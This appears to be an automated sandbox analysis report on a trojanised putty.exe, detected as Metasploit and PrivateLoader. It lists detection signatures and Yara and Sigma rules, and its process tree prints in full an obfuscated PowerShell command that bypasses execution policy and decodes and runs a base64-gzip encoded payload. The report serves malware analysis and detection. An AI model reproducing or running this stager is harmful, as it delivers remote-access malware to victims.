Edit tour
Windows
Analysis Report
putty.exe
Overview
General Information
Detection
Metasploit, PrivateLoader
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected Metasploit Payload
Yara detected PrivateLoader
Bypasses PowerShell execution policy
Found suspicious powershell code related to unpacking or dynamic code loading
Machine Learning detection for sample
PE file has a writeable .text section
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Potential PowerShell Command Line Obfuscation
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Suspicious PowerShell Parameter Substring
Suspicious powershell command line found
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Gzip Archive Decode Via PowerShell
Sigma detected: Suspicious FromBase64String Usage On Gzip Archive - Process Creation
Tries to resolve domain names, but no domain seems valid (expired dropper behavior)
Uses 32bit PE files
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match
Classification
- System is w10x64
- putty.exe (PID: 7256 cmdline:
"C:\Users\ user\Deskt op\putty.e xe" MD5: 334A10500FEB0F3444BF2E86AB2E76DA) - powershell.exe (PID: 7276 cmdline:
powershell .exe -nop -w hidden -noni -ep bypass "&( [scriptblo ck]::creat e((New-Obj ect System .IO.Stream Reader(New -Object Sy stem.IO.Co mpression. GzipStream ((New-Obje ct System. IO.MemoryS tream(,[Sy stem.Conve rt]::FromB ase64Strin g('H4sIAOW /UWECA51W2 27jNhB991c MXHUtIRbhd bdAESCLepV sGyDdNVZu8 2AYCE2NYzU yqZKUL0j87 yUlypLjBNt UL7aGczlz5 kL9AGOxQbk oOIRwK1Otk cN8B5/Mz6S QHCW8g0u6R vidymTX6Rh NplPB4TfU4 S3OWZYi19B 57IB5vA2DC /iCm/Dr/G9 kGsLJLscvd IVGqInRj0r 9Wpn8qfASF 7TIdCQxMSc pzZRx4WlZ4 EFrLMV2R55 pGHlLUut29 g3EvE6t8wj l+ZhKuvKr/ 9NYy5Tfz7x IrFaUJ/1ja awyJvgz4aX Y8EzQpJQGz qcUDJUCR8B KJEWGFuCvf gCVSroAvw4 DIf4D3XnKk 25QHlZ2pW2 WKkO/ofzCh NyZ/ytiWYs Fe0CtyITlN 05j9suHDz+ dGhKlqdQ2r otcnroSXbT 0Roxhro3Dq hx+BWX/Gly Ja5QKTxEfX LdK/hLyaOw CdeeCF2pIm JC5kFRj+U7 zPEsZtUUjm WA06/Ztgg5 Vp2JWaYl0Z dOoohLTgXE pM/Ab4FXhK ty2ibquTi3 USmVx7ewV4 MgKMww7Ete qvovf9xam2 7DvP3oT430 PIVUwPbL5h iuhMUKp04X NCv+iWZqU2 UU0y+aUPcy C4AU4ZFTop e1nazRSb6Q saJW84arJt U3mdL7TOJ3 NPPtrm3VAy HBgnqcfHwd 7xzfypD72p xq3miBnIrG TcH4+iqPr6 8DW4JPV8bu 3pqXFRlX7J F5iloEsODf aYBgqlGnrL pyBh3x9bt+ 4XQpnRmaKd ThgYpUXujm 845HIdzK9X 2rwowCGg/c /wx8pk0KJh YbIUWJJgJG NaDUVSDQB1 piQO37HXdc 6Tohdcug32 fUH/eaF3CC /18t2P9Uz3 +6ok4Z6G1X TsxncGJeWG 7cvyAHn27H WVp+FvKJsa TBXTiHlh33 UaDWw7eMfr fGA1NlWG6/ 2FDxd87V4w PBqmxtuleH 74GV/PKRvY qI3jqFn6ly iuBFVOwdkT PXSSHsfe/+ 7dJtlmqHve 2k5A5X5N6S JX3V8HwZ98 I7sAgg5wuC ktlcWPiYTk 8prV5tbHFa FlCleuZQbL 2b8qYXS8ub 2V0lznQ54a fCsrcy2sFy eFADCekVXz ocf372HJ/h a6LDyCo6KI 1dDKAmpHRu Sv1MC6DVOt haIh1IKOR3 MjoK1UJfnh GVIpR+8hOC i/WIGf9s5n aT/1D6Nm++ OTrtVTgant vmcFWp5uLX dGnSXTZQJh S6f5h6Ntcj ry9N8eXQOX xyH4rirE0J 3L9kF8i/mt l93dQkAAA= ='))),[Sys tem.IO.Com pression.C ompression Mode]::Dec ompress))) .ReadToEnd ()))" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC) - conhost.exe (PID: 7284 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- cleanup
Name | Description | Attribution | Blogpost URLs | Link |
---|---|---|---|---|
PrivateLoader | According to sekoia, PrivateLoader is a modular malware whose main capability is to download and execute one or several payloads. The loader implements anti-analysis techniques, fingerprints the compromised host and reports statistics to its C2 server. | No Attribution |
⊘No configs have been found
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_MetasploitPayload_3 | Yara detected Metasploit Payload | Joe Security | ||
JoeSecurity_PrivateLoader | Yara detected PrivateLoader | Joe Security | ||
Windows_Trojan_Metasploit_a6e956c9 | Identifies the API address lookup function leverage by metasploit shellcode | unknown |
|
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_MetasploitPayload_3 | Yara detected Metasploit Payload | Joe Security | ||
Windows_Trojan_Metasploit_a6e956c9 | Identifies the API address lookup function leverage by metasploit shellcode | unknown |
| |
JoeSecurity_MetasploitPayload_3 | Yara detected Metasploit Payload | Joe Security | ||
Windows_Trojan_Metasploit_a6e956c9 | Identifies the API address lookup function leverage by metasploit shellcode | unknown |
| |
JoeSecurity_PrivateLoader | Yara detected PrivateLoader | Joe Security | ||
Click to see the 2 entries |
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | ditekSHen |
|
System Summary |
---|
Source: | Author: Florian Roth (Nextron Systems): |